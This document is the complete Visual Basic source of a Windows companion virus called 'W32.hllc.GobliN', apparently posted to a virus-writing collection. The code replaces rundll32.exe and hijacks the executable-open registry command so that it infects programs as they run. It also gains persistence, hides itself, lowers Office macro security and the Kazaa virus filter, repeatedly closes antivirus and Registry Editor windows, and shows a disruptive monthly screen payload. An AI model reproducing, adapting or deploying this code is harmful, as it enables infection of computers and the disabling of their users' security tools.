Contribution - W32.hllc.GobliN    [by DR-EF]
[executable virus in a zip archive]

  

'**********************************************************
'W32.hllc.GobliN by DR-EF (c) 2002 all right reserved !!! *
'Goblin is a Companion virus infect exe files.the virus   *
'infect programs when the program run this virus also have*
'a nice graphical payload.                                *
'**********************************************************
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessId As Long, ByVal dwType As Long) As Long
Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Dim virus_path
Private Sub Form_Load() 'main of virus:
Call hide_goblin
Call get_goblin_path
Call Disease_effect
Call payload
Call infect_file
If LCase(App.EXEName) = "rundll32" Then
If App.PrevInstance = True Then End
Call Protect
Else
End
End If
End Sub
Sub payload() 'virus payload:
On Error Resume Next
If Day(Date) <> 29 Then Exit Sub
Dim m, h, t As Boolean
ShowCursor 0
Form1.BackColor = vbBlack
Form1.Label1.ForeColor = vbRed
Form1.Label1.BackColor = vbbblack
Load Form1
Form1.Show
h = Second(Time) + 5
m = Second(Time)
x:
DoEvents
If t = False Then
If m < h Then
Form1.Label1.FontSize = 45
Form1.Label1.Caption = ".-=w32.Hllc.GobliN=-." & vbCrLf & _
"CopyRight To DR-EF" & vbCrLf & "All Right Reseved !!!"
Label1.ForeColor = vbRed
m = Second(Time)
Else
t = True
h = Second(Time) + 5
End If
Else
If m < h Then
Label1.ForeColor = vbYellow
Form1.Label1.FontSize = 70
Form1.Label1.Caption = "GobliN VIRUS !!!"
m = Second(Time)
Else
t = False
h = Second(Time) + 5
End If
End If
If h > 59 Then h = Second(Time) + 5
If m > 59 Then m = Second(Time)
Beep
SendKeys "{Esc}"
DoEvents
Form1.SetFocus
DoEvents
GoTo x
End Sub
Sub Disease_effect() 'virus install:
On Error Resume Next
If Dir("c:\windows\Rundll32.GbN", vbHidden) = "" Then
FileCopy "c:\windows\rundll32.exe", "c:\windows\rundll32.GbN"
FileCopy virus_path, "c:\windows\Rundll32.exe"
SetAttr "c:\windows\rundll32.GbN", vbHidden
SetAttr "c:\windows\rundll32.exe", vbHidden
End If
t = Chr(34)
Open "c:\Goblin_disease.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1, ""
Print #1, "[HKEY_CURRENT_USER\Software\Kazaa\ResultsFilter]"
Print #1, t & "virus_filter" & t & "=dword:00000000"
Print #1, ""
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"
Print #1, ""
Print #1, t & "Hidden" & t & "=dword:00000000"
For i = 8 To 10
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\" & i & ".0\Word\Security]"
Print #1, t & "Level" & "=dword:00000001"
Print #1, t & "AccessVBOM" & t & "=" & t & "1" & t
Print #1, t & "DontTrustInstalledFiles" & t & "=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\" & i & ".0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Next i
Print #1, ""
Print #1, "[HKEY_CLASSES_ROOT\exefile\shell\open\command]"
Print #1, "@=" & t & "\" & t & "c:\\windows\\RunDll32.exe\" & _
t & " %1 %*" & t
Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]"
Print #1, t & "Goblin_By_DR-EF" & t & "=" & t & "c:\\windows\\rundll32.exe" & t
Close #1
Dim Reg As Long, RegHandle As Long
Reg = Shell("regedit /s c:\goblin_disease.reg", vbHide)
RegHandle = OpenProcess(&H100000, False, Reg)
Kill "c:\goblin_disease.reg"
DoEvents
TerminateProcess RegHandle, 0
CloseHandle RegHandle
End Sub
'***********File Infection Engine*******************
Sub infect_file() 'stupid code but work good
On Error GoTo Error
If LCase(App.EXEName) = "rundll32" Then
host = Mid(file, 1, Len(file) - 4) & "GbN"
If Dir(host, vbHidden) = "" Then
DoEvents
Name file As host
FileCopy virus_path, file
SetAttr host, vbHidden
Shell host & " " & parm, vbNormalFocus
Else
Shell host & " " & parm, vbNormalFocus
End If
Else
host = Mid(virus_path, 1, Len(virus_path) - 3) & "GbN"
Shell host & " " & parm, vbNormalFocus
End If
Exit Sub
Error:
Select Case Err.Number
Case Is = 5
host = Mid(virus_path, 1, Len(virus_path) - 3) & "GbN"
Shell host & " " & Command, vbNormalFocus
Case Is = 75
Shell Command, vbNormalFocus
Case Else
If Command = "" Then Exit Sub
Shell comamnd, vbNormalFocus
End Select
End Sub
Function parm() As String 'programs parameters:
For i = 1 To Len(Command)
If LCase(Right(Left(Command, i), 5)) = ".exe " Then
parm = Mid(Command, i, Len(Command))
Exit For
End If
Next i
If parm = "" Then parm = Command
End Function
Function file() 'file to run\infect:
For i = 1 To Len(Command)
scan = LCase(Mid(Command, 1, i))
If Right(scan, 5) = ".exe " Then
s = i
Exit For
End If
Next i
file = Left(Command, s)
End Function
Sub get_goblin_path() 'goblin path:
If Right(App.Path, 1) = "\" Then
virus_path = App.Path & App.EXEName & ".exe"
Else
virus_path = App.Path & "\" & App.EXEName & ".exe"
End If
End Sub
'***************anti easy remove********************
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Call Disease_effect
End Sub
Private Sub Form_Terminate()
Call Disease_effect
End Sub
Sub hide_goblin()
Dim Goblin As Long
Goblin = GetCurrentProcessId
RegisterServiceProcess Goblin, 1
App.TaskVisible = False
Form1.Hide
End Sub
Private Sub Form_Unload(Cancel As Integer)
Call Disease_effect
End Sub
Sub Protect()
If App.PrevInstance = True Then End
If LCase(App.EXEName) <> "rundll32" Then Exit Sub
x:
DisableAV "AVP Monitor"
DisableAV "AntiViral Toolkit Pro"
DisableAV "vsstat"
DisableAV "Iomon98"
DisableAV "Vshwin"
DisableAV "Anti-virus"
DisableAV "Esafe"
DisableAV "F-Secure Anti-Virus"
DisableAV "antivirus"
DisableAV "Navapw32"
DisableAV "Norton AntiVirus"
DisableAV "Registry Editor"
DoEvents
GoTo x
End Sub
Sub DisableAV(AV_Window)
On Error Resume Next
Dim AvWnd As Long
AvWnd = FindWindow(vbNullString, AV_Window)
If AvWnd = 0 Then Exit Sub
PostMessage AvWnd, &H12, 0, 0
End Sub
'****************************************************